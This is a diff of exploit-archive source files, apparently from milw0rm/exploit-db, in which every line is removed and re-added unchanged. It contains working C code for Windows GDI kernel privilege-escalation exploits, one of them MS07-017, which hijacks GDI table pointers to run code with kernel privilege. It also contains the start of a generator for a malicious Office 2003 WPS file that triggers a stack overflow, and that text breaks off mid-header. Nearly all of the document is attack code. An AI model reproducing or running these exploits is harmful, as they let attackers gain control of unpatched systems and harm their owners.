-	
+	
-	HBRUSH hBr;
+	HBRUSH hBr;
-	hBr=CreateSolidBrush(0);
+	hBr=CreateSolidBrush(0);
-
+
-	Upr=(WORD)((DWORD)hBr>>16);
+	Upr=(WORD)((DWORD)hBr>>16);
-	printf("0x%x\n", Upr);
+	printf("0x%x\n", Upr);
-
+
-	while(!lpMapAddress)
+	while(!lpMapAddress)
-	{
+	{
-		hMapFile=(HANDLE)((ULONG)hMapFile+1);
+		hMapFile=(HANDLE)((ULONG)hMapFile+1);
-		lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
+		lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
-	}
+	}
-
+
-	if(lpMapAddress==NULL)
+	if(lpMapAddress==NULL)
-	{ 
+	{ 
-		printf("Error with MapViewOfFile : %d\n", GetLastError()); 
+		printf("Error with MapViewOfFile : %d\n", GetLastError()); 
-		return 0;
+		return 0;
-	}
+	}
-
+
-	Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0);
+	Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0);
-	if (Status) //!=STATUS_SUCCESS (0)
+	if (Status) //!=STATUS_SUCCESS (0)
-	{
+	{
-		printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status); 
+		printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status); 
-		return 0;
+		return 0;
-	}
+	}
-
+
-	printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart);
+	printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart);
-	gdiTable=(GDITableEntry *)lpMapAddress;
+	gdiTable=(GDITableEntry *)lpMapAddress;
-	PID=GetCurrentProcessId();
+	PID=GetCurrentProcessId();
-	
+	
-	for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry))
+	for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry))
-	{
+	{
-		if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush
+		if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush
-		{	
+		{	
-
+
-			printf("gdiTable : 0x%x\n", gdiTable);
+			printf("gdiTable : 0x%x\n", gdiTable);
-			printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo);
+			printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo);
-			printf("ProcessID : %d\n", gdiTable->ProcessID);
+			printf("ProcessID : %d\n", gdiTable->ProcessID);
-			printf("_nCount : %d\n", gdiTable->_nCount);
+			printf("_nCount : %d\n", gdiTable->_nCount);
-			printf("nUpper : 0x%x\n", gdiTable->nUpper);
+			printf("nUpper : 0x%x\n", gdiTable->nUpper);
-			printf("nType : 0x%x\n", gdiTable->nType );
+			printf("nType : 0x%x\n", gdiTable->nType );
-			printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo);
+			printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo);
-			
+			
-			Old=gdiTable->pKernelInfo;
+			Old=gdiTable->pKernelInfo;
-		
+		
-			gdiTable->pKernelInfo=(ULONG)buff; //crafted buff
+			gdiTable->pKernelInfo=(ULONG)buff; //crafted buff
-			break;
+			break;
-		}
+		}
-		gdiTable++;
+		gdiTable++;
-	}
+	}
-
+
-	if(!DeleteObject(hBr))
+	if(!DeleteObject(hBr))
-		printf("Error with DeleteObject : %d\n", GetLastError());
+		printf("Error with DeleteObject : %d\n", GetLastError());
-	else
+	else
-		printf("Done\n");
+		printf("Done\n");
-
+
-	printf("Buff : 0x%x\n", buff);
+	printf("Buff : 0x%x\n", buff);
-	memset(buff, 0x90, sizeof(buff));
+	memset(buff, 0x90, sizeof(buff));
-	
+	
- 	buff[0]=0x1; //!=0
+ 	buff[0]=0x1; //!=0
- 	buff[0x24/4]=Win32kSST; //syscall to modifY
+ 	buff[0x24/4]=Win32kSST; //syscall to modifY
-	buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr
+	buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr
-
+
- 	if(!DeleteObject(hBr))
+ 	if(!DeleteObject(hBr))
-		printf("Error with DeleteObject : %d\n", GetLastError());	
+		printf("Error with DeleteObject : %d\n", GetLastError());	
-		
+		
-	gdiTable->pKernelInfo=Old; //restore old value
+	gdiTable->pKernelInfo=Old; //restore old value
-	
+	
-	/*	
+	/*	
-	lkd> uf GDI32!NtGdiAbortDoc
+	lkd> uf GDI32!NtGdiAbortDoc
-	GDI32!NtGdiAbortDoc:
+	GDI32!NtGdiAbortDoc:
-	77f3073a b800100000      mov     eax,1000h
+	77f3073a b800100000      mov     eax,1000h
-	77f3073f ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
+	77f3073f ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
-	77f30744 ff12            call    dword ptr [edx]
+	77f30744 ff12            call    dword ptr [edx]
-	77f30746 c20400          ret     4
+	77f30746 c20400          ret     4
-	*/
+	*/
-
+
-	__asm
+	__asm
-	{
+	{
-		mov eax, 0x1000
+		mov eax, 0x1000
-		mov edx,0x7ffe0300
+		mov edx,0x7ffe0300
-		call dword ptr [edx]	
+		call dword ptr [edx]	
-	}
+	}
-	
+	
-	return 0;
+	return 0;
-}
+}
-
+
-// milw0rm.com [2007-04-08]
+// milw0rm.com [2007-04-08]
--- a/platforms/windows/local/3755.c
+++ b/platforms/windows/local/3755.c
@ -1,199 +1,199 @@
-/*
+/*
-GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
+GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
-
+
-Coded by Lionel d'Hauenens 
+Coded by Lionel d'Hauenens 
-http://www.labo-asso.com
+http://www.labo-asso.com
-
+
-Development:
+Development:
------------
+------------
-Dev-C++ 4.9.9.2
+Dev-C++ 4.9.9.2
-Linked with /lib/libgdi32.a 
+Linked with /lib/libgdi32.a 
-
+
-References:
+References:
-----------
+-----------
-http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
+http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
-http://research.eeye.com/html/alerts/zeroday/20061106.html
+http://research.eeye.com/html/alerts/zeroday/20061106.html
-http://www.milw0rm.com/exploits/3688 
+http://www.milw0rm.com/exploits/3688 
-http://ivanlef0u.free.fr/?p=41
+http://ivanlef0u.free.fr/?p=41
-
+
-March 16, 2007
+March 16, 2007
-*/
+*/
-
+
-#include <stdio.h> 
+#include <stdio.h> 
-#include <stdlib.h> 
+#include <stdlib.h> 
-#include <windows.h> 
+#include <windows.h> 
-
+
-typedef enum _SECTION_INFORMATION_CLASS
+typedef enum _SECTION_INFORMATION_CLASS
-{
+{
-    SectionBasicInformation,
+    SectionBasicInformation,
-    SectionImageInformation
+    SectionImageInformation
-} SECTION_INFORMATION_CLASS;  
+} SECTION_INFORMATION_CLASS;  
-                                                
+                                                
-typedef struct _SECTION_BASIC_INFORMATION {
+typedef struct _SECTION_BASIC_INFORMATION {
-  ULONG                   Base;
+  ULONG                   Base;
-  ULONG                   Attributes;
+  ULONG                   Attributes;
-  LARGE_INTEGER           Size;
+  LARGE_INTEGER           Size;
-} SECTION_BASIC_INFORMATION;
+} SECTION_BASIC_INFORMATION;
-
+
-typedef struct _GDI_TABLE_ENTRY
+typedef struct _GDI_TABLE_ENTRY
-{
+{
-   PVOID pKernelInfo;
+   PVOID pKernelInfo;
-   WORD  ProcessID; 
+   WORD  ProcessID; 
-   WORD  _nCount;
+   WORD  _nCount;
-   WORD  nUpper;
+   WORD  nUpper;
-   BYTE  nType;
+   BYTE  nType;
-   BYTE  flags;
+   BYTE  flags;
-   PVOID pUserInfo;
+   PVOID pUserInfo;
-} GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY;
+} GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY;
-
+
-typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG);  
+typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG);  
-NTQUERYSECTION NtQuerySection;                                              
+NTQUERYSECTION NtQuerySection;                                              
-
+
-#define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix");
+#define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix");
-#define STATUS_SUCCESS 0
+#define STATUS_SUCCESS 0
-#define PAL_TYPE 8
+#define PAL_TYPE 8
-    
+    
-DWORD flag_test;
+DWORD flag_test;
-
+
-hook (HANDLE pal, COLORREF couleur)
+hook (HANDLE pal, COLORREF couleur)
-{
+{
-     // INT3
+     // INT3
-     // Executed code with kernel privilege
+     // Executed code with kernel privilege
-     asm (".intel_syntax noprefix");
+     asm (".intel_syntax noprefix");
-         __asm ("cli");
+         __asm ("cli");
-         
+         
-         // it's the fiesta !!! :)                 
+         // it's the fiesta !!! :)                 
-         
+         
-         __asm ("sti");         
+         __asm ("sti");         
-     asm (".att_syntax noprefix");
+     asm (".att_syntax noprefix");
-     
+     
-     flag_test = 1;      
+     flag_test = 1;      
-     
+     
-     return (TRUE);     
+     return (TRUE);     
-} 
+} 
-
+
-int main(int argc, char *argv[])
+int main(int argc, char *argv[])
-{    
+{    
-    SECTION_BASIC_INFORMATION SectionInfo;    
+    SECTION_BASIC_INFORMATION SectionInfo;    
-    PGDI_TABLE_ENTRY pGdiEntry;
+    PGDI_TABLE_ENTRY pGdiEntry;
-    PLOGPALETTE pLogPal;
+    PLOGPALETTE pLogPal;
-    HANDLE hPal;
+    HANDLE hPal;
-    PVOID OriginalPalObject;
+    PVOID OriginalPalObject;
-    PVOID FalsePalObject; 
+    PVOID FalsePalObject; 
-       
+       
-    HANDLE hThread = GetCurrentThread();  
+    HANDLE hThread = GetCurrentThread();  
-    DWORD OriginalThreadPriotity = GetThreadPriority (hThread);  
+    DWORD OriginalThreadPriotity = GetThreadPriority (hThread);  
-    HANDLE hSection = (ULONG)0;  
+    HANDLE hSection = (ULONG)0;  
-    PVOID MapFile = 0;
+    PVOID MapFile = 0;
-    HANDLE hProcess = (HANDLE)0xFFFFFFFF;
+    HANDLE hProcess = (HANDLE)0xFFFFFFFF;
-    WORD Pid = GetCurrentProcessId();                 
+    WORD Pid = GetCurrentProcessId();                 
-                  
+                  
-   	NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection");
+   	NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection");
-         
+         
-    printf ("##########################################################\n");                
+    printf ("##########################################################\n");                
-    printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n");
+    printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n");
-    printf ("#        All Windows 2000/XP before MS07-017 patch       #\n");
+    printf ("#        All Windows 2000/XP before MS07-017 patch       #\n");
-    printf ("##########################################################\n");   
+    printf ("##########################################################\n");   
-    printf ("# coded by Lionel d'Hauenens   http://www.labo-asso.com  #\n");
+    printf ("# coded by Lionel d'Hauenens   http://www.labo-asso.com  #\n");
-    printf ("##########################################################\n\n");                                     
+    printf ("##########################################################\n\n");                                     
-                                                      
+                                                      
-    // Search handle section and mapper in virtual memory of user
+    // Search handle section and mapper in virtual memory of user
-    while ((DWORD)hSection<0xFFFF) 
+    while ((DWORD)hSection<0xFFFF) 
-    {
+    {
-        SectionInfo.Attributes = 0;  
+        SectionInfo.Attributes = 0;  
-        MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); 
+        MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); 
-        if (MapFile)
+        if (MapFile)
-        {
+        {
-            NtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0);
+            NtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0);
-            if (SectionInfo.Attributes == SEC_COMMIT) break;  // For compatibility with win2k 
+            if (SectionInfo.Attributes == SEC_COMMIT) break;  // For compatibility with win2k 
-            UnmapViewOfFile(MapFile); 
+            UnmapViewOfFile(MapFile); 
-            MapFile = 0;
+            MapFile = 0;
-        }                
+        }                
-        hSection++;
+        hSection++;
-    }
+    }
-
+
-    if (!MapFile)
+    if (!MapFile)
-    {
+    {
-       printf ("Could not found shared section !\n");
+       printf ("Could not found shared section !\n");
-       exit(0);             
+       exit(0);             
-    }              
+    }              
-
+
-    // Create Palette
+    // Create Palette
-    pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1);    
+    pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1);    
-    pLogPal->palNumEntries = 1;
+    pLogPal->palNumEntries = 1;
-    pLogPal->palVersion = 0x300;
+    pLogPal->palVersion = 0x300;
-    hPal = (HANDLE)CreatePalette(pLogPal);  
+    hPal = (HANDLE)CreatePalette(pLogPal);  
-    
+    
-    if (!hPal)
+    if (!hPal)
-    {
+    {
-       printf ("Could not create palette !\n");
+       printf ("Could not create palette !\n");
-       exit(0);             
+       exit(0);             
-    }      
+    }      
-    
+    
-    // Search the entry of pal object 
+    // Search the entry of pal object 
-    OriginalPalObject = (PVOID)0;        
+    OriginalPalObject = (PVOID)0;        
-    pGdiEntry = (PGDI_TABLE_ENTRY)MapFile;
+    pGdiEntry = (PGDI_TABLE_ENTRY)MapFile;
-    while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart)
+    while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart)
-    {
+    {
-          if ( pGdiEntry->ProcessID == Pid  &&
+          if ( pGdiEntry->ProcessID == Pid  &&
-                  pGdiEntry->nType == PAL_TYPE )
+                  pGdiEntry->nType == PAL_TYPE )
-          {
+          {
-              // Save original pointer
+              // Save original pointer
-              OriginalPalObject =  (PVOID)pGdiEntry->pKernelInfo;                          
+              OriginalPalObject =  (PVOID)pGdiEntry->pKernelInfo;                          
-              break;
+              break;
-          }           
+          }           
-          pGdiEntry++;          
+          pGdiEntry++;          
-    }
+    }
-
+
-    if (!OriginalPalObject)
+    if (!OriginalPalObject)
-    {
+    {
-       printf ("Could not find entry of Pal object !\n");
+       printf ("Could not find entry of Pal object !\n");
-       exit(0);                  
+       exit(0);                  
-    }  
+    }  
-    
+    
-    // Create the false Pal object
+    // Create the false Pal object
-    FalsePalObject                   = (PVOID) calloc(0x100/4,4);
+    FalsePalObject                   = (PVOID) calloc(0x100/4,4);
-    ((PDWORD)FalsePalObject)[0]      = (DWORD)hPal;   // Handle    
+    ((PDWORD)FalsePalObject)[0]      = (DWORD)hPal;   // Handle    
-    ((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1;     // Availabled flag
+    ((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1;     // Availabled flag
-    ((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex 
+    ((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex 
-  
+  
-    printf ("Section:\n--------\n");                                                             
+    printf ("Section:\n--------\n");                                                             
-    printf ("Handle: 0x%08X    Attributes: %08X    Size: 0x%08X\n\n", hSection
+    printf ("Handle: 0x%08X    Attributes: %08X    Size: 0x%08X\n\n", hSection
-                                                                    , SectionInfo.Attributes
+                                                                    , SectionInfo.Attributes
-                                                                    , SectionInfo.Size.QuadPart);
+                                                                    , SectionInfo.Size.QuadPart);
-    printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); 
+    printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); 
-    printf ("Address of user map: 0x%08X\n", MapFile); 
+    printf ("Address of user map: 0x%08X\n", MapFile); 
-    printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject);  
+    printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject);  
-    printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) );     
+    printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) );     
-    printf ("Address of Hook(): 0x%08X\n\n", &hook);  
+    printf ("Address of Hook(): 0x%08X\n\n", &hook);  
-
+
-    //////////////////////////////////////////////////////////////////////////////
+    //////////////////////////////////////////////////////////////////////////////
-    //////////////////////////////////////////////////////////////////////////////  
+    //////////////////////////////////////////////////////////////////////////////  
-    printf ("->Test...");
+    printf ("->Test...");
-    flag_test = 0;            
+    flag_test = 0;            
-    SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); 
+    SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); 
-         
+         
-         // Active false Pal object    
+         // Active false Pal object    
-         pGdiEntry->pKernelInfo = FalsePalObject;   
+         pGdiEntry->pKernelInfo = FalsePalObject;   
-                 
+                 
-              GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :);
+              GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :);
-             
+             
-         // Restore original Pal object
+         // Restore original Pal object
-         pGdiEntry->pKernelInfo = OriginalPalObject; 
+         pGdiEntry->pKernelInfo = OriginalPalObject; 
-    
+    
-    SetThreadPriority (hThread,OriginalThreadPriotity);
+    SetThreadPriority (hThread,OriginalThreadPriotity);
-    //////////////////////////////////////////////////////////////////////////////
+    //////////////////////////////////////////////////////////////////////////////
-    //////////////////////////////////////////////////////////////////////////////
+    //////////////////////////////////////////////////////////////////////////////
-    
+    
-    if (!flag_test) printf ("ERROR !!!\n");
+    if (!flag_test) printf ("ERROR !!!\n");
-    else printf ("OK :)\n");
+    else printf ("OK :)\n");
-
+
-    UnmapViewOfFile(MapFile);
+    UnmapViewOfFile(MapFile);
-    DeleteObject ((HANDLE)hPal);
+    DeleteObject ((HANDLE)hPal);
-    free((PVOID)pLogPal);
+    free((PVOID)pLogPal);
-    free((PVOID)FalsePalObject);  
+    free((PVOID)FalsePalObject);  
-    system("PAUSE");          
+    system("PAUSE");          
-    return (0);         
+    return (0);         
-}
+}
-
+
-// milw0rm.com [2007-04-17]
+// milw0rm.com [2007-04-17]
--- a/platforms/windows/local/4584.c
+++ b/platforms/windows/local/4584.c
--- a/platforms/windows/local/5107.c
+++ b/platforms/windows/local/5107.c
@ -1,240 +1,240 @@
-/*
+/*
-* Copyright (c) 2008 chujwamwdupe - pumpernikiel.c
+* Copyright (c) 2008 chujwamwdupe - pumpernikiel.c
-*
+*
-* one day in teletubby land...
+* one day in teletubby land...
-*
+*
-* an email from idefense:
+* an email from idefense:
-* 
+* 
-* "Unfortunately, Microsoft has refused to credit you using the name you requested."
+* "Unfortunately, Microsoft has refused to credit you using the name you requested."
-*
+*
-* ...what's wrong with 'chujwamwdupe', eh?
+* ...what's wrong with 'chujwamwdupe', eh?
-*
+*
-*
+*
-* Description:
+* Description:
-*    A vulnerability exists in WPS to RTF convert filter that is part
+*    A vulnerability exists in WPS to RTF convert filter that is part
-*    of Microsoft Office 2003. It could be exploited by remote attacker
+*    of Microsoft Office 2003. It could be exploited by remote attacker
-*    to take complete control of an affected system. This issue is due to
+*    to take complete control of an affected system. This issue is due to
-*    stack overflow error in function that read secions from WPS file.
+*    stack overflow error in function that read secions from WPS file.
-*    When we change size of for example TEXT section to number langer than
+*    When we change size of for example TEXT section to number langer than
-*    0x10, stack overflow occurs - very easy to exploit.
+*    0x10, stack overflow occurs - very easy to exploit.
-*
+*
-*
+*
-* Tested on:
+* Tested on:
-*	  Microsoft Windows XP Service Pack 2 && Microsoft Office 2003
+*	  Microsoft Windows XP Service Pack 2 && Microsoft Office 2003
-* 
+* 
-* Usage:
+* Usage:
-*     wps.exe 1 evil.wps
+*     wps.exe 1 evil.wps
-*
+*
-*/
+*/
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <windows.h>
+#include <windows.h>
-
+
-/* WPS Header */
+/* WPS Header */
-unsigned char uszWpsHeader[] =
+unsigned char uszWpsHeader[] =
-"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
-"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
+"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
-"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00"
+"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00"
-"\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xfd\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff\x04\x00\x00\x00"
+"\xfd\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff\x04\x00\x00\x00"
-"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
-"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
